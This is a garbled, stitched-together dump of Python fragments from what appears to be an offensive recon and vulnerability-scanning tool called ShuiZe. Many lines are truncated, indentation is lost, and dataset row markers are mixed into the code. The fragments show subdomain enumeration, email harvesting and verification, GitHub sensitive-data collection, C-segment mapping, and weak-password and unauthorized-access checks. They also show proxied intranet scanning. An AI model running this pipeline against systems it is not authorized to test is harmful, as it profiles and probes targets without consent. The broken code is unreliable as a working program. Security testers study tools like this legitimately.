self.excel.save(self.excelSavePath)
    # Save titles and admin paths of alive web services
def saveWebTitle(self, web_Titles):
self.sheet.cell(self.Sheet_line, 1).value = 'url'
self.sheet.cell(self.Sheet_line, 2).value = '状态码'
self.sheet.cell(self.Sheet_line, 3).value = '标题'
self.sheet.cell(self.Sheet_line, 4).value = 'ip地址'
self.sheet.cell(self.Sheet_line, 5).value = '框架信息'
self.sheet.cell(self.Sheet_line, 6).value = '后台路径'
self.Sheet_line += 1
for web_Title in web_Titles:
url, webCode, webTitle, address, info, background = web_Title
self.sheet.cell(self.Sheet_line, 1).value = url
self.sheet.cell(self.Sheet_line, 2).value = webCode
try:
self.sheet.cell(self.Sheet_line, 3).value = webTitle
except Exception as e:
self.sheet.cell(self.Sheet_line, 3).value = None # 可能会报错
self.sheet.cell(self.Sheet_line, 4).value = address
self.sheet.cell(self.Sheet_line, 5).value = info
try:
self.sheet.cell(self.Sheet_line, 6).value = background
except Exception as e:
self.sheet.cell(self.Sheet_line, 6).value = None
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save vulnerabilities
def saveVul(self, Vul_list):
self.sheet.cell(self.Sheet_line, 1).value = '漏洞名'
self.sheet.cell(self.Sheet_line, 2).value = 'url'
self.sheet.cell(self.Sheet_line, 3).value = '状态'
self.Sheet_line += 1
for vul in Vul_list:
Vul_Name, Vul_url, Vul_exist = vul
            self.sheet.cell(self.Sheet_line, 1).value = Vul_Name  # vulnerability name
            self.sheet.cell(self.Sheet_line, 2).value = Vul_url  # vulnerable url
            self.sheet.cell(self.Sheet_line, 3).value = Vul_exist  # whether the vuln exists: YES, NO, or Maybe
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save related domains and C-segment IP info
def saveNewDomainAndCSubnet(self, newDomains, ip_count):
self.sheet.cell(self.Sheet_line, 1).value = '相关域名'
self.sheet.cell(self.Sheet_line, 2).value = '相关C段'
self.sheet.cell(self.Sheet_line, 3).value = '该C段出现的域名个数'
self.Sheet_line += 1
for newDomain in newDomains:
self.sheet.cell(self.Sheet_line, 1).value = newDomain # 相关域名
self.Sheet_line += 1
self.Sheet_line = 2
for c_subnet in ip_count:
ip_nums = ip_count[c_subnet]
self.sheet.cell(self.Sheet_line, 2).value = c_subnet # 相关C段
self.sheet.cell(self.Sheet_line, 3).value = ip_nums # 相关C段
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
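A minimal usage sketch for the saveToExcel helper above (the save path, sheet title and sample row are illustrative, not from the original):
import openpyxl
excel = openpyxl.Workbook()
# assumes the ./result directory already exists
vulSheet = saveToExcel('./result/demo.xlsx', excel, 'Vul')
vulSheet.saveVul([['Weblogic CVE-2020-14882', 'http://1.2.3.4:7001', 'YES']])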
def run_theHarvester(domain):
uvloop.install()
# all_ip, all_emails, all_hosts = asyncio.run(__main__.entry_point(domain))
return asyncio.run(__main__.entry_point(domain))
def theHarvester():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
theHarvesterIp, emails, hosts = run_theHarvester(domain)
print(hosts)
theHarvesterSubdomains = []
subdomain = None
for host in list(set(hosts)):
if '/' not in host and ' ' not in host:
domain_ip = host.strip().split(':')
if len(domain_ip) == 2:
subdomain, ip = [domain_ip[0]], domain_ip[1]
elif len(domain_ip) == 1:
subdomain, ip = domain_ip, None
if subdomain:
theHarvesterSubdomains.extend(subdomain)
    # test
    # verify that the collected email addresses actually exist
cprint('-' * 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
aliveEmails = run_verifyEmails(emails)
    # save to excel
theHarvesterIpSheet = saveToExcel(excelSavePath, excel, 'theHarvester—IP')
theHarvesterIpSheet.saveTheHarvesterIp(theHarvesterIp)
emailsSheet = saveToExcel(excelSavePath, excel, '邮箱')
emailsSheet.saveEmails(emails, aliveEmails)
return list(set(theHarvesterSubdomains)) | null |
189,265 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
print(hosts)
subdomain = None
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
sublist3rSubdomains = sublist3rRun(domain)
return sublist3rSubdomains
from Plugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
from Plugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
for subdomain in subdomains:
if '.{}'.format(domain) in subdomain:
tmp_subdomains.append(subdomain)
print('Check CDN [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.CDN import checkCDN
print('Query the A record of [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.queryA import queryA
from Plugins.infoGather.subdomain.hostCollide import hostCollide
from Plugins.infoGather.ParamSpider.paramSpider import getParamLinks
for subdomain in Subdomains_ips:
        if CDNSubdomainsDict[subdomain] == 'NOT':  # if this subdomain is not behind a CDN, start counting its resolved IPs
ip_List = Subdomains_ips[subdomain]
for ip in ip_List:
if not is_internal_ip(ip):
ips.append(ip)
import configparser
from Plugins.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
from Plugins.infoGather.subdomain.ip2domain import getIp2Domain
from Plugins.infoGather.subdomain.ipAddress import getIpAddress
for subdomain in list(set(list(Subdomains_ips.keys()) + ip2domainSubdomains)):
    if ':' in subdomain:  # some ip2domain results look like 221.192.236.146:999, so do not append port 80
web_host_port_temp.append(subdomain)
else:
web_host_port_temp.append('{}:80'.format(subdomain))
from Plugins.infoGather.Intranet import getMoreIp
from Plugins.infoGather.webInfo import getWebTitle
print('[total: {}] ksubdomain: {}'.format(len(ksubdomains), ksubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] theHarvester: {}'.format(len(theHarvesterSubdomains), theHarvesterSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] webAPI: {}'.format(len(othersApiTotalSubdomains), othersApiTotalSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] Github: {}'.format(len(githubApiSubdomains), githubApiSubdomains))
print('[total: {}] Spider: {}'.format(len(spiderSubdomains), spiderSubdomains))
print('[total: {}] Certs: {}'.format(len(certsSubdomains), certsSubdomains))
print('[total: {}] Friends: {}'.format(len(fcSubdomains), fcSubdomains))
print('C段的IP:{}'.format(CIP_List))
print(CIP_List)
print(Subdomains_ips)
print(notCDNSubdomains)
for subdomain in notCDNSubdomains:
for ip in Subdomains_ips[subdomain]:
SubdomainAndNotCDNIPs.append(ip)
    webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
for subdomain in Subdomains_ips.keys():
for ip in Subdomains_ips[subdomain]:
allTargets_Queue.put(ip)
allTargets_List.append(ip)
print('[total: {}] ip2domainSubdomains: {}'.format(len(ip2domainSubdomains), ip2domainSubdomains))
print('[ip2domain get new subdomains] [{}]'.format(len(list(set(ip2domainSubdomains)-set(list(Subdomains_ips.keys()))))))
print('[total: {}] web_host_port'.format(len(web_host_port)))
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
print('[total: {}] web_host_port'.format(len(web_host_port)))
print('[total: {}] web_host_port'.format(len(web_host_port)))
print('[total: {}] web_host_port'.format(len(web_host_port)))
def sublist3rRun(domain):
domain = domain
threads = 30
savefile = None
ports = None
enable_bruteforce = False
verbose = False
engines = 'baidu, dnsdumpster, virustotal'
# print(domain, threads, savefile, ports, enable_bruteforce, verbose, engines)
if verbose or verbose is None:
verbose = True
banner()
sublist3rSubdomains = main(domain, threads, savefile, ports, silent=False, verbose=verbose, enable_bruteforce=enable_bruteforce, engines=engines)
return list(sublist3rSubdomains)
def Sublist3r():
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
sublist3rSubdomains = sublist3rRun(domain)
return sublist3rSubdomains | null |
189,266 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
if os.path.exists(github_txt):
gitSensitiveInfo = get_GitSensitiveInfo(github_txt, raw_url_emails)
githubSheet.saveGithub(gitSensitiveInfo)
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
from Plugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
from Plugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
from Plugins.infoGather.subdomain.CDN import checkCDN
from Plugins.infoGather.subdomain.queryA import queryA
from Plugins.infoGather.subdomain.hostCollide import hostCollide
from Plugins.infoGather.ParamSpider.paramSpider import getParamLinks
import configparser
from Plugins.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
from Plugins.infoGather.subdomain.ip2domain import getIp2Domain
from Plugins.infoGather.subdomain.ipAddress import getIpAddress
from Plugins.infoGather.Intranet import getMoreIp
tqdm.write(Fore.BLACK + '-' * 50 + 'scan_IntranetPorts ...' + '-' * 50)
tqdm.write(Fore.BLACK + '-' * 50 + 'get_IntranetHostName and IP ...' + '-' * 50)
tqdm.write(Fore.BLACK + '-' * 50 + 'run_getWebTitle ...' + '-' * 50)
from Plugins.infoGather.webInfo import getWebTitle
sys.path.append(vul_path)
vulList = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
                 os.listdir(vul_path))
for vulName in vulList:
tqdm.write(Fore.BLACK + '-' * 50 + 'detect ' + vulName[:-3] + '-' * 50) # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
if hasattr(md, 'Detect'):
detect = getattr(md, 'Detect') # 获取类
alive_Web_queue = Queue(-1) # 将存活的web存入队列里
for _ in alive_Web:
alive_Web_queue.put(_)
threads = []
if isIntranet == 1:
threadNum = 30 # 如果是扫内网,则线程为5
if vulName in intPassVul:
pass
else:
tqdm.write(Fore.BLACK + '内网不跑{}漏洞'.format(vulName))
continue
else:
threadNum = 100 # 扫外网则线程为300
# 使用快代理时,线程调整
if kuaidaili_thread_num:
threadNum = int(kuaidaili_thread_num)
pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测Web漏洞", ncols=150) # total是总数
for num in range(1, threadNum + 1):
t = detect(alive_Web_queue, pbar, webVul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
threads.append(t)
t.start()
for t in threads:
t.join()
pbar.close()
except Exception as e:
tqdm.write(Fore.BLACK + r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
tqdm.write(Fore.BLACK + '-' * 50 + 'detect Web vul' + '-' * 50)
tqdm.write(Fore.BLACK + '-' * 50 + 'detect param vul' + '-' * 50)
paramVul_list = []
vul_path = os.getcwd() + '/Plugins/Vul/Param/'
sys.path.append(vul_path)
vulList = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
                 os.listdir(vul_path))
for vulName in vulList:
tqdm.write(Fore.BLACK + '-' * 50 + 'detect ' + vulName[:-3] + '-' * 50) # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
paramVul_list = md.detect(param_Links)
except Exception as e:
tqdm.write(Fore.BLACK + r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
    return paramVul_list
    tqdm.write(Fore.BLACK + 'service_host_port : {}'.format(service_host_port))
sys.path.append(unauthVul_path)
vul_path = os.getcwd() + '/Plugins/Vul/Win/'
sys.path.append(vul_path)
vulList = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
                 os.listdir(vul_path))
for vulName in vulList:
cprint('-' * 50 + 'detect ' + vulName[:-3] + '-' * 50, 'green') # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
if hasattr(md, 'Detect'):
detect = getattr(md, 'Detect') # 获取类
alive_host_queue = Queue(-1) # 将存活的主机存入队列里
for _ in alive_host_List:
alive_host_queue.put(_)
threads = []
if isIntranet == 1:
threadNum = 5 # 如果是扫内网,则线程为5
else:
threadNum = 200 # 扫外网则线程为300
for num in range(1, threadNum + 1):
t = detect(alive_host_queue, winVul_list, proxy) # 实例化漏洞类,传递参数:存活主机的队列, 存储漏洞的列表
threads.append(t)
t.start()
for t in threads:
t.join()
except Exception as e:
print(r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
创
反查域
def detect_paramVul(param_Links):
    tqdm.write(Fore.BLACK + '-' * 50 + 'detect param vul' + '-' * 50)  # probe parameter vulnerabilities (injection)
    paramVul_list = []  # stores parameter vulns; each element is a list, e.g. [['SQL', 'http://127.0.0.1/a.php?id=1'], ['SQL', 'http://127.0.0.1/a.php?id=2']]
    vul_path = os.getcwd() + '/Plugins/Vul/Param/'
    sys.path.append(vul_path)  # add the plugin dir to the import path
    vulList = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
                     os.listdir(vul_path))  # collect the vulnerability scripts
    for vulName in vulList:
        tqdm.write(Fore.BLACK + '-' * 50 + 'detect ' + vulName[:-3] + '-' * 50)  # probe each vulnerability
        md = __import__(vulName[:-3])  # import the plugin module
try:
paramVul_list = md.detect(param_Links)
except Exception as e:
tqdm.write(Fore.BLACK + r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
return paramVul_list | null |
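The loop above loads every script under Plugins/Vul/Param/ with __import__ and calls its module-level detect(param_Links). A hypothetical plugin illustrating that contract (the file name, probe logic and returned triple are assumptions, not part of the original project):
# Plugins/Vul/Param/sqlError.py (hypothetical example plugin)
import requests
def detect(param_Links):
    paramVul_list = []
    for link in param_Links:
        try:
            # naive error-based probe: append a quote and look for SQL error strings
            resp = requests.get(link + "'", timeout=5, verify=False)
            if 'SQL syntax' in resp.text or 'mysql_fetch' in resp.text:
                paramVul_list.append(['SQL', link, 'Maybe'])
        except Exception:
            continue
    return paramVul_list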
189,267 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
cf.read("./iniFile/config.ini")
with open(github_txt, 'rt', encoding="utf-8", errors='ignore') as f:
content = f.readlines()
for line, each in enumerate(content):
if '[------------------] ' in each:
line_urls[str(line + 1)] = each.split('[------------------] ')[1]
():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
():
cprint('-' * 50 + 'Load getSocksProxy ...' + '-' * 50, 'green')
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
socksProxysDict = run_getSocksProxy()
cprint('-' * 50 + 'Load beian2NewDomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
cprint('-' * 50 + 'Load Aiqicha ...' + '-' * 50, 'green')
cprint("查询【{}】公司架构".format(companyName), 'red')
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
():
cprint('-' * 50 + 'check Pan-Analysis ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load ksubdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
print(hosts)
* 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
cprint('-' * 50 + 'Load VirusTotal threatcrowd url.fht.im ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
():
cprint('-' * 50 + 'Load Github Api Subdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
if os.path.exists(github_txt):
gitSensitiveInfo = get_GitSensitiveInfo(github_txt, raw_url_emails)
githubSheet.saveGithub(gitSensitiveInfo)
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
cprint('-' * 50 + 'Load Spider ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load crawlCerts ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
newDomains.extend(_newDomains)
from Plugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
cprint('-' * 50 + 'check subdomains CDN and query ip ...' + '-' * 50, 'green')
print('Check CDN [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.CDN import checkCDN
print('Query the A record of [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.queryA import queryA
from Plugins.infoGather.subdomain.hostCollide import hostCollide
from Plugins.infoGather.ParamSpider.paramSpider import getParamLinks
> 1000:
paramLinks = []
cprint('-' * 50 + 'get_CIP ...' + '-' * 50, 'green')
CIP_List = []
for ip in list(set(ips)):
c_subnet = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
CIP_List_all.append(c_subnet)
global ip_count
ip_count = Counter(CIP_List_all)
cprint(ip_count, 'red')
import configparser
cf = configparser.ConfigParser()
cf.read("./iniFile/config.ini")
for ip in ip_count:
if ip_count[ip] > int(c_nums):
CIP_List.append(ip)
return CIP_List
def run_webSpace(domain, ips, CIP_List, fofaTitle):
    cprint('-' * 50 + 'run_webSpace ...' + '-' * 50, 'green')
    from Plugins.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
for ip in list(set(ips)):
ip_C = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
fofaTitle_IPs.append(ip_C)
global ip_count
ip_count = Counter(fofaTitle_IPs)
    newDomains.extend(fofaTitle_newDomains)
    from Plugins.infoGather.subdomain.ip2domain import getIp2Domain
    newDomains.extend(_newDomains)
    from Plugins.infoGather.subdomain.ipAddress import getIpAddress
cprint('-' * 50 + 'collation_web_host ...' + '-' * 50, 'green')
from Plugins.infoGather.Intranet import getMoreIp
from Plugins.infoGather.webInfo import getWebTitle
if isIntranet == 1:
threadNum = 10 # 如果是扫内网,则线程为5
else:
threadNum = 300 # 扫外网则线程为300
oxies = None
    alive_Web = []
    for each in web_Titles:
if each[1] != 65535:
alive_Web.append(each[0])
def detect_webVul(alive_Web):
    # run the local web vulnerability scripts
def runSelfVul():
vul_path = os.getcwd() + '/Plugins/Vul/Web/'
cprint('-' * 50 + 'detect Windows vul' + '-' * 50, 'green')
ip_count):
print('[total: {}] ksubdomain: {}'.format(len(ksubdomains), ksubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] theHarvester: {}'.format(len(theHarvesterSubdomains), theHarvesterSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] webAPI: {}'.format(len(othersApiTotalSubdomains), othersApiTotalSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] Github: {}'.format(len(githubApiSubdomains), githubApiSubdomains))
print('[total: {}] Spider: {}'.format(len(spiderSubdomains), spiderSubdomains))
for subdomain in subdomains:
f.writelines('{}\n'.format(subdomain))
print('[total: {}] Certs: {}'.format(len(certsSubdomains), certsSubdomains))
print('[total: {}] Friends: {}'.format(len(fcSubdomains), fcSubdomains))
for subdomain in subdomains:
f.writelines('{}\n'.format(subdomain))
CIP_List = get_CIP(Subdomains_ips, CDNSubdomainsDict, censysIPS)
print('C段的IP:{}'.format(CIP_List))
run_cSubnet(CIP_List, Subdomains_ips, notCDNSubdomains, param_Links)
print(CIP_List)
print(Subdomains_ips)
print(notCDNSubdomains)
IPs) > 10:
SubdomainAndNotCDNIPs = []
    webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
print('[total: {}] ip2domainSubdomains: {}'.format(len(ip2domainSubdomains), ip2domainSubdomains))
print('[ip2domain get new subdomains] [{}]'.format(len(list(set(ip2domainSubdomains)-set(list(Subdomains_ips.keys()))))))
print('[total: {}] web_host_port'.format(len(web_host_port)))
= 0:
webVul_list = detect_webVul(alive_Web) # 获取C段资产
if domain:
        # paramVul_list = detect_paramVul(param_Links)  # injection scanning disabled
paramVul_list = []
else:
paramVul_list = []
    # 13. unauthorized-access and weak-password checks
unauthWeakVul_list = detect_unauthWeakVul(webSpace_service_host_port) # 获取C段资产
# unauthWeakVul_list = []
    # 14. print and save the vulnerabilities
Vul_list = webVul_list + unauthWeakVul_list + paramVul_list
printSave_Vul(Vul_list)
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
ranetWeb():
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
for i in range(2, intranetServiceSheet.max_row + 1): # 遍历每行
eachline = []
for j in range(1, intranetServiceSheet.max_column + 1): # 遍历每列
eachValue = intranetServiceSheet.cell(row=i, column=j).value
if j == 3:
eachValue = int(eachValue)
eachline.append(eachValue)
service_host_port.append(eachline) # []
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
File = openpyxl.load_workbook(masNmapFile)
for i in range(2, masNmapSheet.max_row + 1): # 遍历每行
eachline = []
for j in range(1, masNmapSheet.max_column + 1): # 遍历每列
eachValue = masNmapSheet.cell(row=i, column=j).value
if j == 3:
eachValue = int(eachValue)
eachline.append(eachValue)
if 'http' in eachline[0]:
url = '{}://{}:{}'.format(eachline[0], eachline[1], eachline[2])
else:
url = 'http://{}:{}'.format(eachline[1], eachline[2])
web_host_port.append(url)
service_host_port.append(eachline)
# if 'http' in eachline[0]:
# url = '{}://{}:{}'.format(eachline[0], eachline[1], eachline[2])
# web_host_port.append(url)
# else:
# service_host_port.append(eachline)
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
def banner():
banner = ''' __ ____ ___ ____
/ \ __ __ |__ | |_ ) |__ |
| () | \ \ / / / / / / /
\__/ /_\_\ /_/ /___| /_/ author:ske
脚本自带Linux版本的Nuclei和ksubdomain,如果是windows或者mac,需要自行更换版本。
Plugins/infoGather/subdomain/ksubdomain/ksubdomain.py
Plugins/Vul/Nuclei/NucleiApi.py
最好在配置文件里填入fofa、shodan、github、censys的API,这样效果最佳。
请一定要配置fofa的api~~~最好是高级会员
配置文件地址:iniFile/config.ini
'''
print(banner)
with open("versionFlag.txt", "rt", encoding="utf-8") as f:
now_version = f.read().strip()
try:
res = requests.get(url=version_url, headers=headers, timeout=10, verify=False)
new_version = res.text.strip()
# print("最新版本: \n{}".format(new_version))
if now_version == new_version:
cprint("目前版本最新", 'red')
else:
add_version = new_version.replace(now_version, "")
# cprint("更新内容如下:{}\n".format(add_version), "red")
cprint("目前版本非最新,建议及时更新...\n地址: https://github.com/0x727/ShuiZe_0x727/", 'red')
except Exception as e:
print('获取版本信息失败...')
def _init():
global domain, cSubnet, save_fold_path, excel, excel_name, excelSavePath, proxy, \
requests_proxies, isIntranet, xlsxFileWB, weak, CIP_List, allTargets_List, \
allTargets_Queue, masNmapFile, newDomains, ip_count, fofaTitle, ksubdomain, justInfoGather, socksProxysDict, kuaidaili_thread_num
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111 内网:使用代理扫描内网C段资产:web标题和漏洞
# proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx 内网:使用proxychains4代理扫描C段的服务漏洞:弱口令和未授权
# python3 %prog --mn masNmap.xlsx 外网:扫描masscan和nmap的结果
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1 内网:使用wifi或者vpn的情况下扫web标题和漏洞
banner()
checkVersion()
usage = '\n\t' \
'python3 %prog -d domain.com\n\t' \
'python3 %prog -d domain.com --justInfoGather 1\n\t' \
'python3 %prog -d domain.com --ksubdomain 0\n\t' \
'python3 %prog -c 192.168.1.0,192.168.2.0,192.168.3.0\n\t' \
'python3 %prog -f url.txt\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111\n\t' \
'python3 %prog -n 1 -f url.txt -p 1.1.1.1:1111 --web 1\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1\n\t' \
'proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'proxychains4 python3 %prog -n 1 -w 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx -w 1\n\t' \
'python3 %prog --fofaTitle 大学\n\t' \
'python3 %prog --domainFile domain.txt\n\t'
parse = OptionParser(usage=usage)
parse.add_option('-d', '--domain', dest='domain', type='string', help='target domain')
parse.add_option('-c', '--cSubnet', dest='cSubnet', type='string', help='target cSubnet')
# parse.add_option('--proxyFlag', dest='proxyFlag', type='int', default=0, help='0:No,1:kuaidaili,2:tencentcs') # 0不使用代理扫描,1使用快代理扫描,2使用腾讯云函数扫描
parse.add_option('-n', '--intranet', dest='isIntranet', type='int', default=0, help='Scan intranet value set to 1') # 扫描内网, 值为1扫内网, 默认为0
parse.add_option('-p', '--proxy', dest='proxy', type='string', default=None, help='Intranet proxy socks5 socks4') # 代理,socks5和socks4, 默认为None,可用于外网扫描,也可以用于内网扫描
parse.add_option('-f', '--file', dest='File', type='string', default=None, help='/result/2ddcaa3ebbd0/172.18.82.0.xlsx') # 扫描内网的服务漏洞-未授权和弱口令
parse.add_option('-w', '--weak', dest='weak', type='int', default=None, help='run weak password script') # 内网弱口令是否要跑
parse.add_option('-v', '--vpn', dest='vpn', type='int', default=None, help='Run in the case of vpn') # 在vpn的情况下跑
parse.add_option('--web', dest='web', type='int', default=None, help='detect web in Intranet') # 跑内网的web漏洞
parse.add_option('--mn', dest='masNmapFile', type='str', default=None, help='run masscan nmap result') # 跑masscan和nmap的结果
parse.add_option('--fofaTitle', dest='fofaTitle', type='str', default=None, help='run fofa title') # 跑fofa的title
